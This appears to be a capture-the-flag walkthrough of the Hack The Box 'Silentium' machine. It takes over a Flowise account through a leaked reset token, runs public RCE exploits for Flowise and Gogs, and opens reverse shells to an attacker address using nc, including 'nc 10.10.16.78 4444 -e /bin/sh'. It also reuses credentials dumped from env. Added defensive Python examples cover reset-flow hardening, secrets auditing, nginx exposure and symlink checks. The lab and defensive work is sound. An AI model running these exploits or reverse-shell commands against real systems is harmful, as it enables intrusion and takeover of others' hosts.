htb silentium machine (easy)
user flag
$ sudo nmap -sS -sV silentium.htb
Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-22 18:19 +0100
Nmap scan report for silentium.htb (10.129.43.204)
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ ffuf -u http://silentium.htb -H "Host: FUZZ.silentium.htb" -w ~/Downloads/subdomains-top1million-5000.txt -fc 301
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0
________________________________________________
:: Method : GET
:: URL : http://silentium.htb
:: Wordlist : FUZZ: /home/coutinho/Downloads/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.silentium.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 301
________________________________________________
staging [Status: 200, Size: 3142, Words: 789, Lines: 70, Duration: 45ms]
:: Progress: [5000/5000] :: Job [1/1] :: 628 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
Edit /etc/hosts and add the new subdomain.
On that subdomain we find a Flowise AI instance.
POST /api/v1/account/forgot-password
{"user":{"email":"ben@silentium.htb"}}
response:
{
"user": {
"id": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"name": "admin",
"email": "ben@silentium.htb",
"credential": "$2a$05$6o1ngPjXiRj.EbTK33PhyuzNBn2CLo8.b0lyys3Uht9Bfuos2pWhG",
"tempToken": "QYxOfsedo3OUaCIA6vdJ751bDUtqWEOrOF4l8VP9V1oIBEtSpDsg4sU8Y8zgboMa",
"tokenExpiry": "2026-04-22T16:27:09.228Z",
"status": "active",
"createdDate": "2026-01-29T20:14:57.000Z",
"updatedDate": "2026-04-22T16:12:09.000Z",
"createdBy": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"updatedBy": "e26c9d6c-678c-4c10-9e36-01813e8fea73"
},
"organization": {},
"organizationUser": {},
"workspace": {},
"workspaceUser": {},
"role": {}
}
POST /api/v1/account/reset-password
{"user":{"email":"ben@silentium.htb","tempToken":"QYxOfsedo3OUaCIA6vdJ751bDUtqWEOrOF4l8VP9V1oIBEtSpDsg4sU8Y8zgboMa","password":"Pelel3123!"}}
response:
{
"user": {
"id": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"name": "admin",
"email": "ben@silentium.htb",
"credential": "$2a$05$kXTSM4369yzG2JxSh88Hn.UnCAl9GEHejA0Tklb.HOZpWaxQfwDVq",
"tempToken": "",
"tokenExpiry": null,
"status": "active",
"createdDate": "2026-01-29T20:14:57.000Z",
"updatedDate": "2026-04-22T16:13:29.000Z",
"createdBy": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"updatedBy": "e26c9d6c-678c-4c10-9e36-01813e8fea73"
},
"organization": {},
"organizationUser": {},
"workspace": {},
"workspaceUser": {},
"role": {}
}
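The forgot-password response above hands the reset token (and the bcrypt hash) straight back to whoever asked, which is what lets the account be taken over without ever touching the mailbox. The following is an added example, not Flowise code: it puts that leaky pattern beside a hardened reset flow with a generic response, hash-only token storage, expiry, single use and constant-time comparison. The USERS dict, the OUTBOX list standing in for the SMTP sender, and the 15-minute TTL are all constructed assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Constructed stand-ins for the application's user table and SMTP sender (assumptions).
USERS = {
    "ben@silentium.htb": {
        "id": "user-1",
        "name": "admin",
        "credential": "<stored password hash placeholder>",
        "reset_token_hash": None,
        "reset_expiry": None,
    }
}
OUTBOX = []  # (recipient, token) pairs that would have gone out by e-mail
TOKEN_TTL_SECONDS = 15 * 60


def forgot_password_leaky(email):
    """The pattern seen in the response above: mint a reset token and return the
    whole user record, token and password hash included, to an unauthenticated
    caller. The unknown-address branch also doubles as an account-enumeration oracle."""
    user = USERS.get(email)
    if user is None:
        return {"error": "no such user"}
    user["tempToken"] = secrets.token_urlsafe(48)
    user["tokenExpiry"] = time.time() + TOKEN_TTL_SECONDS
    return {"user": dict(user)}


def _hash_token(token):
    # Store only a hash, so a database read does not yield usable tokens.
    return hashlib.sha256(token.encode()).hexdigest()


def forgot_password_hardened(email, now=None):
    """The token leaves the server only through the mail channel, only its hash is
    stored, and the HTTP response is the same whether or not the account exists."""
    now = time.time() if now is None else now
    user = USERS.get(email)
    if user is not None:
        token = secrets.token_urlsafe(48)
        user["reset_token_hash"] = _hash_token(token)
        user["reset_expiry"] = now + TOKEN_TTL_SECONDS
        OUTBOX.append((email, token))
    return {"message": "If that address is registered, a reset link has been sent."}


def reset_password_hardened(email, token, new_password, now=None):
    """Consume the token: it must exist, be unexpired and match in constant time;
    it is cleared before the credential is rotated so it can never be replayed."""
    now = time.time() if now is None else now
    user = USERS.get(email)
    if user is None or not user["reset_token_hash"]:
        return False
    if now > user["reset_expiry"]:
        user["reset_token_hash"] = user["reset_expiry"] = None
        return False
    if not hmac.compare_digest(user["reset_token_hash"], _hash_token(token)):
        return False
    user["reset_token_hash"] = user["reset_expiry"] = None
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", new_password.encode(), salt, 200_000)
    user["credential"] = salt.hex() + "$" + digest.hex()
    return True
```

The `now` parameter exists only so expiry can be exercised deterministically; in a real handler it would come from the clock. The point to take from the pair is that the hardened forgot-password endpoint returns nothing the caller did not already know.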
Log in with the new password.
Now an authenticated RCE exploit for Flowise AI:
https://github.com/r3nsi15/Flowise-RCE-CVE-2025-59528
$ python3 CVE-2025-59528_POC.py -e "ben@silentium.htb" -i "http://staging.silentium.htb" -p "Pelel3123!" -c "nc 10.10.16.78 4444 -e /bin/sh"
[+] Logged in
We get a root shell in the Docker container running the application.
env
FLOWISE_PASSWORD=F1l3_d0ck3r
ALLOW_UNAUTHORIZED_CERTS=true
NODE_VERSION=20.19.4
HOSTNAME=c78c3cceb7ba
YARN_VERSION=1.22.22
SMTP_PORT=1025
SHLVL=3
PORT=3000
HOME=/root
OLDPWD=/
SENDER_EMAIL=ben@silentium.htb
PUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium-browser
JWT_ISSUER=ISSUER
JWT_AUTH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
LLM_PROVIDER=nvidia-nim
SMTP_USERNAME=test
SMTP_SECURE=false
JWT_REFRESH_TOKEN_EXPIRY_IN_MINUTES=43200
FLOWISE_USERNAME=ben
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
DATABASE_PATH=/root/.flowise
JWT_TOKEN_EXPIRY_IN_MINUTES=360
JWT_AUDIENCE=AUDIENCE
SECRETKEY_PATH=/root/.flowise
PWD=/root
SMTP_PASSWORD=r04D!!_R4ge
NVIDIA_NIM_LLM_MODE=managed
SMTP_HOST=mailhog
JWT_REFRESH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
SMTP_USER=test
Running a simple env command shows a password in the SMTP_PASSWORD environment variable, r04D!!_R4ge. I tested it as the SSH password for the ben user; it worked and I got the user flag.
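The env dump above is a good specimen of what a secrets audit should catch before a shell ever lands in the container: credentials living in process environment, a JWT signing secret that is a repeated placeholder, the same value doing duty for two different secrets, and config values that are just the key's own name. The following is an added example, not part of the writeup or of Flowise; SAMPLE_ENV is a constructed copy of a subset of the variables shown above, and the key-name patterns and thresholds are my own choices. It cannot see what actually broke the box here, the SMTP password being reused as a host user's SSH password, because that reuse is only visible across systems.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample: a subset of the environment printed above.
SAMPLE_ENV = """\
FLOWISE_PASSWORD=F1l3_d0ck3r
NODE_VERSION=20.19.4
JWT_ISSUER=ISSUER
JWT_AUTH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
SMTP_USERNAME=test
JWT_REFRESH_TOKEN_EXPIRY_IN_MINUTES=43200
DATABASE_PATH=/root/.flowise
JWT_AUDIENCE=AUDIENCE
SECRETKEY_PATH=/root/.flowise
SMTP_PASSWORD=r04D!!_R4ge
JWT_REFRESH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
"""

# Key names that normally carry a secret, and name fragments that mean "not a secret
# after all" (paths, expiry settings); both lists are assumptions, extend as needed.
SECRET_KEY = re.compile(r"(PASSWORD|PASSWD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)")
NOT_A_SECRET = re.compile(r"(_PATH$|EXPIRY|_URL$|_FILE$)")
PLACEHOLDERS = {"test", "changeme", "password", "secret", "admin", "example"}


def entropy_bits(value):
    """Shannon entropy per character; low values mean few distinct symbols."""
    counts = Counter(value)
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_env(text):
    env = {}
    for line in text.splitlines():
        if "=" in line and not line.startswith("#"):
            key, _, value = line.partition("=")
            env[key.strip()] = value
    return env


def audit_env(text):
    """Return (key, reason) findings for the given `env` output."""
    env = parse_env(text)
    findings = []
    by_value = defaultdict(list)
    for key, value in env.items():
        # A value that is a known dummy, or just the last word of its own key name.
        if value.lower() in PLACEHOLDERS or value.upper() == key.rsplit("_", 1)[-1]:
            findings.append((key, "PLACEHOLDER"))
        if not SECRET_KEY.search(key) or NOT_A_SECRET.search(key) or not value:
            continue
        findings.append((key, "SECRET_IN_ENV"))
        by_value[value].append(key)
        if re.fullmatch(r"(.{2,8})\1{2,}", value):
            findings.append((key, "REPEATED_PATTERN"))
        elif len(value) >= 16 and entropy_bits(value) < 3.0:
            findings.append((key, "LOW_ENTROPY"))
    for value, keys in by_value.items():
        if len(keys) > 1:  # one secret signing both access and refresh tokens, etc.
            findings.extend((key, "REUSED_VALUE") for key in keys)
    return findings


if __name__ == "__main__":
    for key, reason in audit_env(SAMPLE_ENV):
        print(f"{reason:16} {key}")
```

Feed it the real output of env, or a .env file, and act on SECRET_IN_ENV by moving values to a mounted secret or a secrets manager, on REPEATED_PATTERN and LOW_ENTROPY by rotating the secret, and on REUSED_VALUE by giving each purpose its own key.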
root flag
Running linpeas on the machine, we see several ports listening:
╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:46051 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8025 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1025 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
A new subdomain, staging-v2-code.dev.silentium.htb, appears in the nginx configuration:
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Apr 2 13:31 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 Jan 29 20:02 /etc/nginx/sites-enabled/staging -> /etc/nginx/sites-available/staging
server {
    listen 80;
    listen [::]:80;
    server_name staging.silentium.htb;
    location / {
        proxy_pass http://127.0.0.1:3000;
    }
}
lrwxrwxrwx 1 root root 42 Jan 29 21:29 /etc/nginx/sites-enabled/staging-v2-code -> /etc/nginx/sites-available/staging-v2-code
server {
    listen 80;
    server_name staging-v2-code.dev.silentium.htb;
    location / {
        proxy_pass http://127.0.0.1:3001;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
    }
}
```

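Both vhosts above proxy a loopback-only service (ports 3000 and 3001) to anyone who sends the right Host header, with no allow/deny or authentication at the proxy, which is exactly what the earlier ffuf run was looking for. The following is an added example, not part of the writeup or of nginx: a small audit that walks server blocks in an nginx config and lists every internal upstream reachable by hostname alone. SAMPLE_CONF is constructed from the two blocks above plus a third, guarded block of my own; the brace-counting parser and the list of directives treated as access control are assumptions.

```python
import re

# Constructed sample: the two vhosts found on the box plus one guarded block.
SAMPLE_CONF = """\
server {
    listen 80;
    listen [::]:80;
    server_name staging.silentium.htb;
    location / {
        proxy_pass http://127.0.0.1:3000;
    }
}
server {
    listen 80;
    server_name staging-v2-code.dev.silentium.htb;
    location / {
        proxy_pass http://127.0.0.1:3001;
        proxy_set_header Host $host;
    }
}
server {
    listen 80;
    server_name admin.example.test;
    location / {
        allow 10.0.0.0/8;
        deny all;
        proxy_pass http://127.0.0.1:9000;
    }
}
"""

# Directives that restrict who reaches the upstream (assumed list; extend for your setup).
ACCESS_CONTROL = re.compile(r"^\s*(allow|deny|auth_basic|auth_request)\b", re.M)
LOOPBACK_UPSTREAM = re.compile(
    r"proxy_pass\s+https?://(127\.\d+\.\d+\.\d+|localhost|\[::1\]):(\d+)"
)


def server_blocks(conf):
    """Return the body text of each top-level server { ... } block, brace-counted
    so nested location blocks stay inside their server."""
    blocks, i = [], 0
    while True:
        m = re.search(r"\bserver\s*\{", conf[i:])
        if not m:
            return blocks
        start = j = i + m.end()
        depth = 1
        while j < len(conf) and depth:
            depth += {"{": 1, "}": -1}.get(conf[j], 0)
            j += 1
        blocks.append(conf[start : j - 1])
        i = j


def audit_vhosts(conf):
    """One record per (server_name, loopback upstream) pair, with whether any
    access-control directive appears anywhere in that server block."""
    findings = []
    for block in server_blocks(conf):
        names = re.search(r"server_name\s+([^;]+);", block)
        names = names.group(1).split() if names else ["<default>"]
        upstreams = [f"{host}:{port}" for host, port in LOOPBACK_UPSTREAM.findall(block)]
        guarded = bool(ACCESS_CONTROL.search(block))
        for name in names:
            for upstream in upstreams:
                findings.append({"host": name, "upstream": upstream, "guarded": guarded})
    return findings


def exposed_internal_services(conf):
    """The list a defender wants: internal ports reachable by Host header alone."""
    return [(f["host"], f["upstream"]) for f in audit_vhosts(conf) if not f["guarded"]]


if __name__ == "__main__":
    for host, upstream in exposed_internal_services(SAMPLE_CONF):
        print(f"{host} -> {upstream} (no access control)")
```

Run it over the concatenation of /etc/nginx/sites-enabled/* (or `nginx -T` output, which resolves includes). A hit does not mean the upstream is vulnerable, only that its exposure is decided by DNS guesswork rather than by policy; staging and dev services in particular should sit behind an allow list or SSO.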
which is served by Gogs, running as root:
ben@silentium:/tmp$ ps aux | grep gogs
root 1494 0.0 1.8 1812308 72880 ? Ssl 17:24 0:01 /opt/gogs/gogs/gogs web
The following repository contains an RCE exploit:
https://github.com/Ghxstsec/CVE-2025-8110
The Python script needs to be edited at lines 52-54 to set the correct user and token values. These can be obtained by registering a user on the platform, going to http://staging-v2-code.dev.silentium.htb/user/settings/applications and generating an access token.
$ python3 CVE-2025-8110-RCE.py -u "http://staging-v2-code.dev.silentium.htb" -lh 10.10.16.78 -lp 4444 -p "pelele"
_____ _____ _____
/ ____| __ \ / ____|
| | __| |__) | | __
| | |_ | _ /| | |_ |
| |__| | | \ \| |__| |
\_____|_| \_\\_____|
CVE-2025-8110 - Gogs Remote Code Execution
Authenticated RCE via Symlink + sshCommand Injection
Author : ghxtsec
Based on: zAbuQasem original PoC
------------------------------------------------
[+] Login exitoso
Repo creation status: 201
[+] Repo creado: 5f9bc5daa98d
Clonando con URL: http://pelele:pelele@staging-v2-code.dev.silentium.htb/pelele/5f9bc5daa98d.git
[master 909a3eb] Add malicious symlink
1 file changed, 1 insertion(+)
create mode 120000 malicious_link
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 16 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 291 bytes | 291.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
To http://staging-v2-code.dev.silentium.htb/pelele/5f9bc5daa98d.git
a4a9d90..909a3eb master -> master
[+] Symlink subido y pusheado correctamente
Start a listener beforehand:
nc -lvnp 4444
Then receive the reverse shell and cat the root flag.
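The git output above shows the exploit's payload for what it is: a single committed symlink (mode 120000) pushed to the server. A self-hosted forge that processes pushed trees should refuse symlinks that resolve outside the repository or into its .git directory before anything else touches them. The following is an added example, not part of the writeup or of Gogs: a pure-function policy check over tree entries of the kind `git ls-tree -r` gives you (mode, path, and for symlink blobs the target read with `git cat-file`), suitable for a pre-receive hook. The SAMPLE_TREE entries are constructed; the reasons and the list of refused targets are my own choices.

```python
import posixpath

SYMLINK_MODE = "120000"  # git tree mode for a symbolic link


def _escapes(link_path, target):
    """True when a symlink at link_path (repo-relative, POSIX) would resolve
    outside the repository or into a .git directory."""
    if posixpath.isabs(target):
        return True
    resolved = posixpath.normpath(posixpath.join(posixpath.dirname(link_path), target))
    if resolved == ".." or resolved.startswith("../"):
        return True
    return ".git" in resolved.split("/")  # ".git", ".git/x", "sub/.git/x"


def check_tree(entries):
    """entries: iterable of (mode, path, symlink_target_or_None).
    Returns a list of (path, reason) rejections; an empty list means the push
    passes this policy. Regular files are ignored."""
    rejections = []
    for mode, path, target in entries:
        if mode != SYMLINK_MODE:
            continue
        if not target:
            rejections.append((path, "symlink with empty target"))
        elif _escapes(path, target):
            rejections.append((path, f"symlink escapes repository: -> {target}"))
    return rejections


# Constructed sample tree: one benign relative link and three that should be refused.
SAMPLE_TREE = [
    ("100644", "README.md", None),
    ("120000", "docs/latest", "v2"),
    ("120000", "outside", "../../secrets.txt"),
    ("120000", "etc", "/etc/hostname"),
    ("120000", "dotgit", ".git"),
]

if __name__ == "__main__":
    for path, reason in check_tree(SAMPLE_TREE):
        print(f"REJECT {path}: {reason}")
```

Wiring it into a pre-receive hook means listing the tree of each pushed commit, reading the target of every 120000 blob, and exiting non-zero when check_tree returns anything. The check is deliberately on tree entries rather than the checked-out filesystem, so it runs before the server has written any link to disk.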